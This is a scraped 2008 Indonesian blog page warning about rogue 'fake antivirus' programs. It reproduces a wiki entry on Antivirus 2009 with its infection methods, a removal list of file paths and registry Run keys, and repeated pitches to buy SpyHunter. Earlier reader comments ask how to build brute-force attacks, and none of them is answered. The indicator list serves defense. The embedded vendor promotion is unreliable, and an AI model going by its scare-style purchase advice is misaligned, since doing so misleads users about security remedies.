Mas bgmn cr bkn Brute force attack??tlong kirim ke email sy rian_man@telkom.net,oy Mas tujuan sy hanya belajar tidak untuk menyakiti orang lain lho….thx ya Mas

  1. rian Berkata:
    21 Juli, 2008 pada 2:21 pm

Mas cr bikin Brute force attack bgmn??tlong di jelaskan??tujuan sy hny belajar tidak untuk menyakiti email org mhon ya Mas…ni email sy rian_man@telkom.net thx y Mas

  1. rika Berkata:
    29 Juli, 2008 pada 8:29 am

makasih udah berbagi ilmunya, di tunggu lagi tulisan terbaru nya,,,sukses terus buat IT.

  1. mawar Berkata:
    31 Juli, 2008 pada 11:07 pm

mas d tunggu artikel lain nya biar isa d buat pelajaran buat yg lain kyk gw ini yg masih newbie mas ???? thaxz ya info nya??…..

  1. janaka Berkata:
    12 Agustus, 2008 pada 10:54 am

makasaih yaw mas

  1. smkalinabah Berkata:
    10 Oktober, 2008 pada 9:37 am

thanks infonya bos, beri saya pelajaran lagi

  1. dragonexodia Berkata:
    15 Oktober, 2008 pada 4:39 pm

baguzz nih boleh di coba !!!! thxzz

  1. dragonexodia Berkata:
    15 Oktober, 2008 pada 4:51 pm

i2 khaaann cuma cara tuk nangkal hack or crack.

tapi omong-omong cara bobol pass gimane yeeeeeee !!!!!!!!

  1. 3v4n Berkata:
    25 Oktober, 2008 pada 11:06 pm

makazzi bos infonya.
tak tunggu new2 selanjutnya?

Tinggalkan Balasan

Top of Form

Nama (wajib)

Surat (tidak akan dipublikasikan) (wajib)

Situs web

XHTML: Anda dapat gunakan tag ini: <a href=”” title=””> <abbr title=””> <acronym title=””> <b> <blockquote cite=””> <cite> <code> <del datetime=””> <em> <i> <q cite=””> <strike> <strong>

Bottom of Form

Beberapa waktu terakhir ini muncul banyak “Antivirus Palsu” yang bisa berbahaya jika terinstall di komputer. Jika kita sedang browsing dan tiba-tiba muncul pesan untuk menginstall program atau antvirus tertentu atau pesan bahwa komputer kita terinfeksi virus, trojan, spyware dan sejenisnya, maka harus berhati-hati, bisa-bisa komputer kita di install antivirus palsu.

Mengapa Antivirus palsu ? karena melihat tampilan dan proses kerjanya, kita akan yakin bahwa program ini benar-benar antivirus atau anti spyware, malware dan sejenisnya dan hampir tidak tampak bahwa program ini menyimpan maksud tertentu diluar tampilannya yang terkesan antivirus.

Dalam dunia Virus-Antivirus (security), program ini masuk dalam kategori Rogue Security Program, yaitu software yang mengaku men-scan/mendeteksi malware (virus, trojan, worm, spyware dan sejenisnya) atau berbagai masalah lain di komputer, tetapi pada dasarnya berusaha menipu atau mendesak penggunanya untuk membeli program tersebut dengan cara menganggu, menampilkan pesan yang tidak benar tentang kondisi komputer, menampilkan hasil scan yang tidak benar dan sejenisnya. Terkadang aplikasi ini ter install tanpa sepengetahuan pengguna atau tanpa ijin. Meski sebagian mungkin hanya menampilkan pesan agar membeli program tersebut, tetapi sebagian lainnya mempunyai tingkat bahaya yang cukup tinggi, seperti membuka celah keamanan komputer, menganggu koneksi jaringan, modifikasi file sistem, mengumpulkan informasi pribadi, menggunakan banyak resources CPU/Memory komputer dan sebagainya. Jika di komputer terdapat salah satu program diatas atau antivirus yang belum dikenal (asing / belum terpercaya), maka sebaiknya program tersebut di uninstall. Berbagai informasi tentang software sejenis juga dapat ditemukan di alamat http://sunbeltblog.blogspot.com.

Adapun salah satu yang Rogue Spyware yang baru aja aku temukan adalah ANTIVIRUS 2009  ( http://www.wiki-security.com/wiki/Parasite/Antivirus2009 )

Antivirus 2009

Artikel ini berasal dari Wiki-Security, the free encyclopedia of computer security

Untuk pengecekan komputer anda tentang adanya program  Antivirus 2009, gunakan SpyHunter Spyware Detection Tool.

SpyHunter spyware detection tool is only a scanner meant to assist you in detecting Antivirus 2009 and other threats. If you detect the presence of Antivirus 2009 on your PC, you have the opportunity to purchase the SpyHunter removal tool to remove any traces of Antivirus 2009.

Detection of Antivirus 2009 (Recommended)

Antivirus 2009 is difficult to detect and remove. Antivirus 2009 is not likely to be removed through a convenient “uninstall” feature. Antivirus 2009, as well as other spyware, can re-install itself even after it appears to have been removed.

You also run the risk of damaging your computer since you’re required to find and delete sensitive files in your system such as DLL files and registry keys. It is recommended you use a good spyware remover to remove Antivirus 2009 and other spyware, adware, trojans and viruses on your computer.

Run a Antivirus 2009 scan/check to successfully detect all Antivirus 2009 files with the SpyHunter Spyware Detection Tool. If you wish to remove Antivirus 2009, you can either purchase the SpyHunter spyware removal tool to remove Antivirus 2009 or follow the Antivirus 2009 manual removal method provided in the “Remedies and Prevention” section.

Method of Infection

There are many ways your computer could get infected with Antivirus 2009. Antivirus 2009 can come bundled with shareware or other downloadable software.

Another method of distributing Antivirus 2009 involves tricking you by displaying deceptive pop-up ads that may appear as regular Windows notifications with links which look like buttons reading Yes and No. No matter which “button” that you click on, a download starts, installing Antivirus 2009 on your system. Antivirus 2009 installs on your computer through a trojan and may infect your system without your knowledge or consent.

If you think you may already be infected with Antivirus 2009, use this SpyHunter Spyware dectection tool to detect Antivirus 2009 and other common Spyware infections. After detection of Antivirus 2009, the next advised step is to remove Antivirus 2009 with the purchase of the SpyHunter Spyware removal tool.

Symptoms

Antivirus 2009 may attempt to change your computer’s desktop, hijack your browser, monitor your Internet browsing activities, change system files, and can do this without your knowledge or permission. Therefore, it is strongly recommended to remove all traces of Antivirus 2009 from your computer.

Remedies and Prevention

Antivirus 2009, as well as other Spyware, are constantly evolving and becoming more advanced to avoid detection. Antivirus 2009 along with its variants can install in different locations and even when you try to uninstall it you find they reappear when you reboot your computer.

Install a good anti-spyware software

When there’s a large number of traces of Spyware, for example Antivirus 2009, that have infected a computer, the only remedy may be to automatically run a Spyware scan from a good anti-spyware software designed to detect Antivirus 2009 and other types of spyware.

Remove Antivirus 2009 manually

Another method to remove Antivirus 2009 is to manually delete Antivirus 2009 files in your system. Detect and remove the following Antivirus 2009 files:

Processes

  • av2009.exe

  • Antivirus2009.exe

  • AV2009Install.exe

  • av2009[1].exe

  • AV2009Install_880405[1].exe

  • AV2009Install_880405[2].exe

  • c:\Program Files\Antivirus 2009\av2009.exe

  • c:\WINDOWS\system32\ieupdates.exe

  • Power-Antivirus-2009.exe

  • AV2009Install[1].exe

  • ieexplorer32.exe

DLLs

  • c:\WINDOWS\system32\winsrc.dll

  • %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\S96PZM7V\winsrc[1].dll

Other Files

  • %ProgramFiles%\Antivirus 2009

  • Antivirus 2009.lnk

  • Uninstall Antivirus 2009.lnk

  • c:\Program Files\Antivirus 2009

  • c:\WINDOWS\system32\scui.cpl

  • %UserProfile%\Desktop\Antivirus 2009.lnk

  • %UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Antivirus 2009.lnk

  • %UserProfile%\Start Menu\Antivirus 2009

  • %UserProfile%\Start Menu\Antivirus 2009\Uninstall Antivirus 2009.lnk

  • %UserProfile%\Start Menu\Antivirus 2009\Antivirus 2009.lnk

  • %UserProfile%\Start Menu\Antivirus 2009

  • %ProgramFiles%\Power-Antivirus-2009

  • %ProgramFiles%\AV9

  • ieexplorer32.exe-removed_skip

Registry Keys

  • Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Antivirus 2009

  • HKEY_CURRENT_USER\Software\75319611769193918898704537500611

  • HKEY_CLASSES_ROOT\CLSID\{037C7B8A-151A-49E6-BAED-CC05FCB50328}

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “ieupdate”

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “75319611769193918898704537500611″

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{037C7B8A-151A-49E6-BAED-CC05FCB50328}

Sumber : http://staff.blog.ui.edu/snug99/2008/10/16/hati-hati-dengan-antivirus-palsu/

Entri ini dituliskan pada 31 Oktober, 2008 pada 5:35 pm dan disimpan dalam Hardware dan PC, Seputar Virus, Teknologi Informasi, Umum. . Anda bisa mengikuti setiap tanggapan atas artikel ini melalui RSS 2.0 pengumpan. Anda bisa tinggalkan tanggapan, atau lacak tautan dari situsmu sendiri.

Tinggalkan Balasan

Top of Form

Nama (wajib)

Surat (tidak akan dipublikasikan) (wajib)

Situs web

XHTML: Anda dapat gunakan tag ini: <a href=”” title=””> <abbr title=””> <acronym title=””> <b> <blockquote cite=””> <cite> <code> <del datetime=””> <em> <i> <q cite=””> <strike> <strong>

Bottom of Form

About these ads

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: